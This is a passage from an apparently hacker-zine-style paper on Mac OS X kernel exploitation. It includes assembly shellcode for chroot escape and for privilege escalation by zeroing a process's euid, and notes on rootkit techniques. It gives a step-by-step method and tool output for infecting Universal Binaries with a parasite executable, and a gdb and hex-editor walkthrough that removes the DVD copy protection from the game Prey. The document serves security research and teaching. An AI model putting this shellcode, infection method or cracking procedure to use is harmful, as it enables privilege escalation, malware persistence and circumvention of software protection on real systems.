/chroot/file_outside_chroot 0 -rw-r--r-- 1 root admin 0 Jan 29 12:17 /chroot/file_outside_chroot As you can see, the /usr/sbin/chroot command which ships with Mac OS X does not chdir() and therefore does not really do very much at all. The author suggests the following addition be made to the chroot man page on Mac OS X: "Caution: Does not work." On an unrelated note, this patch would also be suitable for the setreuid() man page. I won't spend too much time on this since noir already covered it really well in his paper. [6] Basically as noir mentions, all we need to do to break our process out of the chroot() is to set the p->p_fd->fd_rdir element in our proc struct to NULL. We can get the address of our proc struct using sysctl as mentioned earlier. noir already provides us with the instructions for this: mov edx,[ecx + 0x14] ;# edx = p->p_fd mov [edx + 0xc],eax ;# p->p_fd->fd_rdir = 0 --[ 5.3 - Advancements Now that we are familiar with writing shellcode for use in local exploits, where we already have local access to the box, the rest of the kernel related code in this paper will focus on accomplishing it's task without any userspace access required. In order to do this, we can utilize the per cpu/task/proc/ and thread structures in the kernel. The definitions for each of these structures can be found in the osfmk/kern and bsd/sys/ directories in various header files. The first struct which we will look at is the "cpu_data" struct found in osfmk/i386/cpu_data.h. I have included the definition for this struct below: /* * Per-cpu data. * * Each processor has a per-cpu data area which is dereferenced through the * using this, in-lines provides single-instruction access to frequently * used members - such as get_cpu_number()/cpu_number(), and * get_active_thread()/ current_thread(). * * Cpu data owned by another processor can be accessed using the * cpu_datap(cpu_number) macro which uses the cpu_data_ptr[] array of * per-cpu pointers. */ typedef struct cpu_data { struct cpu_data *cpu_this; /* pointer to myself */ thread_t cpu_active_thread; void *cpu_int_state; /* interrupt state */ vm_offset_t cpu_active_stack; /* kernel stack base */ vm_offset_t cpu_kernel_stack; /* kernel stack top */ vm_offset_t cpu_int_stack_top; int cpu_preemption_level; int cpu_simple_lock_count; int cpu_interrupt_level; int cpu_number; /* Logical CPU */ int cpu_phys_number; /* Physical CPU */ cpu_id_t cpu_id; /* Platform Expert */ int cpu_signals; /* IPI events */ int cpu_mcount_off; /* mcount recursion */ ast_t cpu_pending_ast; int cpu_type; int cpu_subtype; int cpu_threadtype; int cpu_running; uint64_t rtclock_intr_deadline; rtclock_timer_t rtclock_timer; boolean_t cpu_is64bit; task_map_t cpu_task_map; addr64_t cpu_task_cr3; addr64_t cpu_active_cr3; addr64_t cpu_kernel_cr3; cpu_uber_t cpu_uber; void *cpu_chud; void *cpu_console_buf; struct cpu_core *cpu_core; /* cpu's parent core */ struct processor *cpu_processor; struct cpu_pmap *cpu_pmap; struct cpu_desc_table *cpu_desc_tablep; struct fake_descriptor *cpu_ldtp; cpu_desc_index_t cpu_desc_index; int cpu_ldt; #ifdef MACH_KDB /* XXX Untested: */ int cpu_db_pass_thru; vm_offset_t cpu_db_stacks; void *cpu_kdb_saved_state; spl_t cpu_kdb_saved_ipl; int cpu_kdb_is_slave; int cpu_kdb_active; #endif /* MACH_KDB */ boolean_t cpu_iflag; boolean_t cpu_boot_complete; int cpu_hibernate; pmsd pms; /* Power Management Stepper control */ uint64_t rtcPop; /* when the etimer wants a timer pop */ vm_offset_t cpu_copywindow_bas; uint64_t *cpu_copywindow_pdp; vm_offset_t cpu_physwindow_base; uint64_t *cpu_physwindow_ptep; void *cpu_hi_iss; boolean_t cpu_tlb_invalid; uint64_t *cpu_pmHpet; /* Address of the HPET for this processor */ uint32_t cpu_pmHpetVec; /* Interrupt vector for HPET for this processor */ /* Statistics */ pmStats_t cpu_pmStats; /* Power management data */ uint32_t cpu_hwIntCnt[256]; /* Interrupt counts */ uint64_t cpu_dr7; /* debug control register */ } cpu_data_t; As you can see, this structure contains valuable information for our shellcode running in the kernel. We just need to figure out how to access it. The following macro shows how we can access this structure. /* Macro to generate inline bodies to retrieve per-cpu data fields. */ #define offsetof(TYPE,MEMBER) ((size_t) &((TYPE *)0)->MEMBER) #define CPU_DATA_GET(member,type) \ type ret; \ __asm__ volatile ("movl %%gs:%P1,%0" \ : "=r" (ret) \ : "i" (offsetof(cpu_data_t,member))); \ return ret; When our code is executing in kernel space the gs selector can be used to access our cpu_data struct. The first element of this struct contains a pointer to the struct itself, so we no longer need to use gs after this. The first objective we will look at is the ability to find the init process (pid=1) via this struct. Since our code may not be running with an associated user space thread, we cannot count on the uthread struct being populated in our thread_t struct. An example of this might be when we exploit a network stack or kernel extension. The first step we must make to find the init process struct is to retrieve the pointer to our thread_t struct. We can do this by simply retrieving the pointer at gs:0x04. The following instructions will achieve this: _main: xor ebx,ebx ;# zero ebx mov eax,[gs:0x04 + ebx] ;# thread_t. After these instructions are executed, we have a pointer to our thread struct in eax. The thread struct is defined in osfmk/kern/thread.h. A portion of this struct is shown below: struct thread { ... queue_chain_t links; /* run/wait queue links */ run_queue_t runq; /* run queue thread is on SEE BELOW */ wait_queue_t wait_queue; /* wait queue we are currently on */ event64_t wait_event; /* wait queue event */ integer_t options;/* options set by thread itself */ ... /* Data used during setrun/dispatch */ timer_data_t system_timer; /* system mode timer */ processor_set_t processor_set;/* assigned processor set */ processor_t bound_processor; /* bound to a processor? */ processor_t last_processor; /* processor last dispatched on */ uint64_t last_switch; /* time of last context switch */ ... void *uthread; #endif }; This struct, again, contains many fields which are useful for our shellcode. However, in this case we are trying to find the proc struct. Because we might not necessarily already have a uthread associated with us, as mentioned earlier, we must look elsewhere for a list of tasks to locate init (launchd). The next step in this process is to retrieve the "last_processor" element from our thread_t struct. We do this using the following instructions: mov bl,0xf4 mov ecx,[eax + ebx] ;# last_processor The last_processor pointer points to a processor struct as the name suggests ;) We can walk from the last_processor struct back to the default pset in order to find the pset which contains init. mov eax,[ecx] ;# default_pset + 0xc We then retrieve the task head from this struct. push word 0x458 pop bx mov eax,[eax + ebx] ;# tasks head. And retrieve the bsd_info element of the task. This is a proc struct pointer. push word 0x19c pop bx mov eax,[eax + ebx] ;# get bsd_info The proc struct is defined in xnu/bsd/sys/proc_internal.h. The first element of the proc struct is: LIST_ENTRY(proc) p_list; /* List of all processes. */ We can walk this list o find a particular process that we want. For most of our code we will start with a pointer to the init process (launchd on Mac OS X). This process has a pid of 1. To find this we simply walk the list checking the pid field at offset 36. The code to do this is as follows: next_proc: mov eax,[eax+4] ;# prev mov ebx,[eax + 36] ;# pid dec ebx test ebx,ebx ;# if pid was 1 jnz next_proc done: ;# eax = struct proc *init; Now that we have developed code which will retrieve a pointer to the proc struct for the init process, we can look at some of the things that we can accomplish using this pointer. The first thing which we will look at is simply rewriting the privilege escalation code listed earlier. Our new version of this code will not require any help from userspace (sysctl etc). I think the below code is fairly self explanatory. %define PID 1337 find_pid: mov eax,[eax + 4] ;# eax = next proc mov ebx,[eax + 36] ;# pid cmp bx,PID jnz find_pid mov ecx, [eax + 8] ;# ecx = ucred xor eax,eax mov [ecx + 12], eax ;# zero out the euid As you can see the cpu_data struct opens up many possibilities for our shellcode. Hopefully I will have time to go into some of these in a future paper. --[ 6 - Misc Rootkit Techniques In this section I will run over a few short pieces of information which might be relevant to someone who is developing a rootkit for Mac OS X. I didn't really have another place to put this stuff, so this will have to do. The first thing to note is that an API exists [21] for executing userspace applications from kernelspace. This is called the Kernel User Notification Daemon. This is implemented using a mach port which the kernel uses to communicate with a userspace daemon named kuncd. The file xnu/osfmk/UserNotification/UNDRequest.defs contains the Mach Interface Generator (MIG) interface definitions for the communication with this daemon. The mach port is called: "com.apple.system.Kernel[UNC]Notifications" and is registered by the daemon /usr/libexec/kuncd. Here is an example of how to use this interface programmatically. The interface allows you to display messages via the GUI to the user, and also run any application. kern_return_t ret; ret = KUNCExecute( "/Applications/TextEdit.app/Contents/MacOS/TextEdit", kOpenAppAsRoot, kOpenApplicationPath ); ret = KUNCExecute( "Internet.prefPane", kOpenAppAsConsoleUser, kOpenPreferencePanel ); There may be a situation where you wish code to be executed on all the processors on a system. This may be something like updating the IDT / MSR and not wanting a processor to miss out on it. The xnu kernel provides a function for this. The comment and prototype explain this a lot better than I can. So here you go: /* * All-CPU rendezvous: * - CPUs are signalled, * - all execute the setup function (if specified), * - rendezvous (i.e. all cpus reach a barrier), * - all execute the action function (if specified), * - rendezvous again, * - execute the teardown function (if specified), and then * - resume. * * Note that the supplied external functions _must_ be reentrant and aware * that they are running in parallel and in an unknown lock context. */ void mp_rendezvous(void (*setup_func)(void *), void (*action_func)(void *), void (*teardown_func)(void *), void *arg) { The code for the functions related to this are stored in xnu/osfmk/i386/mp.c. --[ 7 - Universal Binary Infection [SINCE YOU CHAT A BIT ABOUT MACH-O HERE, MAYBE MOVE THIS SECTION TO SOMEWHERE EARLIER IN THE PAPER? YOU CAN EXPAND A LITTLE AND IT MIGHT MAKE THE LINKEDIT / LC_SYMTAB ETC SECTION MORE CLEAR AS YOU ALSO GO INTO THE MAGIC NUMER MUMBO-JUMBO HERE AS WELL] The Mach-O object format is used on operating systems which have a kernel based on Mach. This is the format which is used by Mac OS X. Significant work has already been done regarding the infection of this format. The papers [12] and [13] show some of this. Mach-O files can be identified by the first four bytes of the file which contain the magic number 0xfeedface. Recently Mac OS X has moved from the PowerPC platform to Intel architecture. This move has caused a new binary format to be used for most of the applications on Mac OS X 10.4. The Universal Binary format is defined in the Mach-O Runtime reference from Apple. [4]. The Universal Binary format is a fairly trivial archive format which allows for multiple Mach-O files of varying architecture types to be stored in a single file. The loader on Mac OS X is able to interpret this file and distinguish which of the Mach-O files inside the archive matches the architecture type of the current system. (We'll look at this a little more later.) The structures used by Mac OS X to define and parse Universal binaries are contained in the file /usr/include/mach-o/fat.h. Universal binaries are recognizable, again, by the magic number in the first four bytes of the file. Universal binaries begin with the following header: struct fat_header { uint32_t magic; /* FAT_MAGIC */ uint32_t nfat_arch; /* number of structs that follow */ }; The magic number on a universal binary is as follows: #define FAT_MAGIC 0xcafebabe #define FAT_CIGAM 0xbebafeca /* NXSwapLong(FAT_MAGIC) */ Either FAT_MAGIC or FAT_CIGAM is used depending on the endian of the file/system. The nfat_arch field of this structure contains the number of Mach-O files of which the archive is comprised. On a side note if you set this high enough to wrap, just about every debugging tool on Mac OS X will crash, as demonstrated below: -[nemo@fry:~]$ printf "\xca\xfe\xba\xbe\x66\x66\x66\x66" > file -[nemo@fry:~]$ otool -tv file Segmentation fault For each of the Mach-O files in the Universal binary there is also a fat_arch structure. This structure is shown below: struct fat_arch { cpu_type_t cputype; /* cpu specifier (int) */ cpu_subtype_t cpusubtype; /* machine specifier (int) */ uint32_t offset; /* file offset to this object file */ uint32_t size; /* size of this object file */ uint32_t align; /* alignment as a power of 2 */ }; The fat_arch structure defines the architecture type of the Mach-O file, as well as the offset into the Universal binary in which it is stored. It also contains the alignment of the architecture for the particular file, expressed as a power of 2. The diagram below describes the layout of a typical Universal binary: [YOU SWITCH CAPITALIZATION OF UNIVERSAL QUITE OFTEN IN THIS SECTION] ._________________________________________________, |0xcafebabe | | struct fat_header | |-------------------------------------------------| | fat_arch struct #1 |------------+ |-------------------------------------------------| | | fat_arch struct #2 |---------+ | |-------------------------------------------------| | | | fat_arch struct #n |------+ | | |-------------------------------------------------|<-----------+ |0xfeedface | | | | | | | | Mach-O File #1 | | | | | | | | | | | |-------------------------------------------------|<--------+ |0xfeedface | | | | | | Mach-O File #2 | | | | | | | | |-------------------------------------------------|<-----+ |0xfeedface | | | | Mach-O file #n | | | | | '-------------------------------------------------' Here you can see the file beginning with a fat_header structure. Following this are n * fat_arch structures each defining the offset into the file to find the particular Mach-O file described by the structure. Finally n * Mach-O files are appended to the structs. Before I run through the method for infecting Universal binaries I will first show how the kernel loads them. The file: xnu/bsd/kern/kern_exec.c contains the code shown in this section. First the kernel sets up a NULL terminated array of execsw structs. Each of these structures contain a function pointer to an image activator / parser for the different image types, as well as a relevant string description. The definition and declaration of this array is shown below: /* * Our image activator table; this is the table of the image types we are * capable of loading. We list them in order of preference to ensure the * fastest image load speed. * * XXX hardcoded, for now; should use linker sets */ struct execsw { int (*ex_imgact)(struct image_params *); const char *ex_name; } execsw[] = { { exec_mach_imgact, "Mach-o Binary" }, { exec_fat_imgact, "Fat Binary" }, #ifdef IMGPF_POWERPC { exec_powerpc32_imgact, "PowerPC binary" }, #endif /* IMGPF_POWERPC */ { exec_shell_imgact, "Interpreter Script" }, { NULL, NULL} }; The following code from the execve() system call loops through each of the elements in this array and calls the function pointer for each one. A pointer to the start of the image is passed to it. int execve(struct proc *p, struct execve_args *uap, register_t *retval) { ... for(i = 0; error == -1 && execsw[i].ex_imgact != NULL; i++) { error = (*execsw[i].ex_imgact)(imgp); Each of the functions parses the file to determine if the file is of the appropriate architecture type. The function which is responsible for matching and parsing Universal binaries is the "exec_fat_imgact" function. The declaration of this function is below: /* * exec_fat_imgact * * Image activator for fat 1.0 binaries. If the binary is fat, then we * need to select an image from it internally, and make that the image * we are going to attempt to execute. At present, this consists of * reloading the first page for the image with a first page from the * offset location indicated by the fat header. * * Important: This image activator is byte order neutral. * * Note: If we find an encapsulated binary, we make no assertions * about its validity; instead, we leave that up to a rescan * for an activator to claim it, and, if it is claimed by one, * that activator is responsible for determining validity. */ static int exec_fat_imgact(struct image_params *imgp) The first thing this function does is test the magic number at the top of the file. The following code does this. /* Make sure it's a fat binary */ if ((fat_header->magic != FAT_MAGIC) && (fat_header->magic != FAT_CIGAM)) { error = -1; goto bad; } The fatfile_getarch_affinity() function is then called to search the universal binary for a Mach-O file with the appropriate architecture type for the system. /* Look up our preferred architecture in the fat file. */ lret = fatfile_getarch_affinity(imgp->ip_vp, (vm_offset_t)fat_header, &fat_arch, (p->p_flag & P_AFFINITY)); This function is defined in the file: xnu/bsd/kern/mach_fat.c. load_return_t fatfile_getarch_affinity( struct vnode *vp, vm_offset_t data_ptr, struct fat_arch *archret, int affinity) This function searches each of the Mach-O files within the Universal binary. A host has a primary and secondary architecture. If during this search, a Mach-O file is found which matches the primary architecture type for the host, this file is used. If, however, the primary architecture type is not found, yet the secondary type is found, this will be used. This is useful when infecting this format. Once an appropriate Mach-O file has been located the imgp ip_arch_offset and ip_arch_size attributes are updated to reflect the new position in the file. /* Success. Indicate we have identified an encapsulated binary */ error = -2; imgp->ip_arch_offset = (user_size_t)fat_arch.offset; imgp->ip_arch_size = (user_size_t)fat_arch.size; After this fatfile_getarch_affinity() simply returns and lets execve() continue walking the execsw[] struct array to find an appropriate loader for the new file. This logic means that it does not really matter if the true architecture type of the file matches up with the architecture specified in the fat_header struct within the Universal binary. Once a Mach-O file is chosen it will be treated as a fresh binary. The method which I propose to infect Universal binaries utilizes this behavior. A breakdown of this method is as follows: 1) Determine the primary and secondary architecture types for the host machine. 2) Parse the fat_header struct of the host binary. 3) Walk through the fat_arch structs and locate the struct for the secondary architecture type. 4) Check that the size of the parasite is smaller than the secondary architecture Mach-O file in the Universal binary. 5) Copy the parasite binary directly over the secondary arch binary inside the universal binary. 6) Locate the primary architecture's fat_arch structure. 7) Modify the architecture type field in this structure to be 0xdeadbeef. Now when the binary is executed, the primary architecture is not found. Due to this, the secondary architecture is used. The imgp is set to point to the offset in the file containing our parasite, and this is executed as expected. The parasite then opens it's own binary (which is quite possible on Mac OS X) and performs a linear search for 0xdeadbeef. It then modifies this value, changing it back to the primary architecture type and execve()'s it's own file. Some sample code has been provided with this paper that demonstrates this method on Intel architecture. The code unipara.c will copy an Intel architecture Mach-O file over the PowerPC Mach-O file inside a Universal binary. After infection has occurred the size of the host file remains unchanged. -[nemo@fry:~/code/unipara]$ ./unipara host parasite -[nemo@fry:~/code/unipara]$ ./host uid=501(nemo) gid=501(nemo) -[nemo@fry:~/code/unipara]$ wc -c host 43028 host -[nemo@fry:~/code/unipara]$ ./unipara parasite host [+] Initiating infection process. [+] Found: 2 arch structs. [+] We are good to go, attaching parasite. [+] parasite implanted at offset: 0x6000 [+] Switching arch types to execute our parasite. -[nemo@fry:~/code/unipara]$ wc -c host 43028 host -[nemo@fry:~/code/unipara]$ ./host Hello, World! uid=501(nemo) gid=501(nemo) If residency is required after the payload has already been executed, the parasite can simply fork() before modifying it's binary. The parent process can then execve() while the child waits and then returns the architecture type to 0xdeadbeef. --[ 8 - Cracking Example - Prey Recently, during an extra long stopover in LAX airport (the most boring airport in the entire world) I decided I would pass the time by playing the game "Prey" which I had installed onto my laptop. To my horror, when I tried to start up my game, I was greeted with the following error message: "Please insert the disc "Prey" or press Quit." "Veuillez inserer le disque "Prey" ou appuyer sur Quitter." "Bitte legen Sie "Prey" ins Laufwerk ein oder klicken Sie auf Beenden." Since I had nothing better to do, I decided to spend some time removing this error message. First things first I determined the object format of the executable file. -[nemo@fry:/Applications/Prey/Prey.app/Contents/MacOS]$ file Prey Prey: Mach-O universal binary with 2 architectures Prey (for architecture ppc): Mach-O executable ppc Prey (for architecture i386): Mach-O executable i386 The Prey executable is a Universal binary containing a PowerPC and an i386 Mach-O binary. Next I ran the otool -o command to determine if the code was written in Objective-C. The output from this command shows that an Objective-C segment is present in the file. -[nemo@largeprompt]$ otool -o Prey | head -n 5 Prey: Objective-C segment Module 0x27ef458 version 6 size 16 I then used the "class-dump" command [14] to dump the class definitions from the file. Probably the most interesting of which is shown below: @interface DOOMController (Private) - (void)quakeMain; - (BOOL)checkRegCodes; - (BOOL)checkOS; - (BOOL)checkDVD; @end Most games on Mac OS X are 10 years behind their Windows counterparts when it comes to copy protection. Typically the developers don't even strip the file and symbols are still present. Because of this fact, I fired up gdb and put a breakpoint on the main function. (gdb) break main Breakpoint 1 at 0x96b64 However when I executed the file the error message was displayed prior to my breakpoint in main being reached. This lead me to the conclusion that a constructor function was responsible for check. To validate this theory I ran the command "otool -l" on the binary to list the load commands present in the file. (The Mach-O Runtime Document [4] explains the load_command struct clearly). Each section in the Mach-O file has a "flags" value associated with it. This describes the purpose of the section. Possible values for this flags variable are found in the file: /usr/include/mach-o/loader.h. The value which represents a constructor section is defined as follows: /* section with only function pointers for initialization*/ #define S_MOD_INIT_FUNC_POINTERS 0x9 Looking through the "otool -l" output there is only one section which has the flags value: 0x9. This section is shown below: Section sectname __mod_init_func segname __DATA addr 0x00515cec size 0x00000380 offset 5328108 align 2^2 (4) reloff 0 nreloc 0 flags 0x00000009 reserved1 0 reserved2 0 Now that the virtual address of the constructor section for this application was known, I simply fired up gdb again and put breakpoints on each of the pointers contained in this section. (gdb) x/x 0x00515cec 0x515cec <_ZTI14idSIMD_Generic+12>: 0x028cc8db (gdb) 0x515cf0 <_ZTI14idSIMD_Generic+16>: 0x00495852 (gdb) 0x515cf4 <_ZTI14idSIMD_Generic+20>: 0x0049587c ... (gdb) break *0x028cc8db Breakpoint 1 at 0x28cc8db (gdb) break *0x00495852 Breakpoint 2 at 0x495852 (gdb) break *0x0049587c Breakpoint 3 at 0x49587c ... I then executed the program. As expected the first break point was hit before the error message box was displayed. (gdb) r Starting program: /Applications/Prey/Prey.app/Contents/MacOS/Prey Breakpoint 1, 0x028cc8db in dyld_stub_log10f () (gdb) continue I then continued execution and the error message appeared. This happened before the second breakpoint was reached. This indicated that the first pointer in the __mod_init_func was responsible for the DVD checking process. In order to validate my theory I restarted the process. This time I deleted all breakpoints except the first one. (gdb) delete Delete all breakpoints? (y or n) y (gdb) break *0x028cc8db Breakpoint 4 at 0x28cc8db (gdb) r Starting program: /Applications/Prey/Prey.app/Contents/MacOS/Prey Reading symbols for shared libraries . done Once the breakpoint is reached, I simply "return" from the constructor, without testing for the DVD. Breakpoint 4, 0x028cc8db in dyld_stub_log10f () (gdb) ret Make selected stack frame return now? (y or n) y #0 0x8fe0fcc4 in _dyld__ZN16ImageLoaderMachO16doInitialization... () And then continue execution. (gdb) c The error message was gone and Prey started up as if the DVD was in the drive, SUCCESS! After playing the game for about 10 minutes and running through the same boring corridor over and over again I decided it was more fun to continue cracking the game than to actually play it. I exited the game and returned to my shell. In order to modify the binary I used the HT Editor. [15] Before I could use HTE to modify this file however, I had to extract the appropriate architecture for my system from the Universal binary. I accomplished this using the ditto command as follows. -[nemo@fry:/Prey/Prey.app/Contents/MacOS]$ ditto -arch i386 Prey Prey.i386 -[nemo@fry:/Prey/Prey.app/Contents/MacOS]$ cp Prey Prey.backup -[nemo@fry:/Applications/Prey/Prey.app/Contents/MacOS]$ cp Prey.i386 Prey I then loaded the file in HTE. I pressed F6 to select the mode and chose the Mach-O/header option. I then scrolled down to find the __mod_init_func section. This is shown as follows: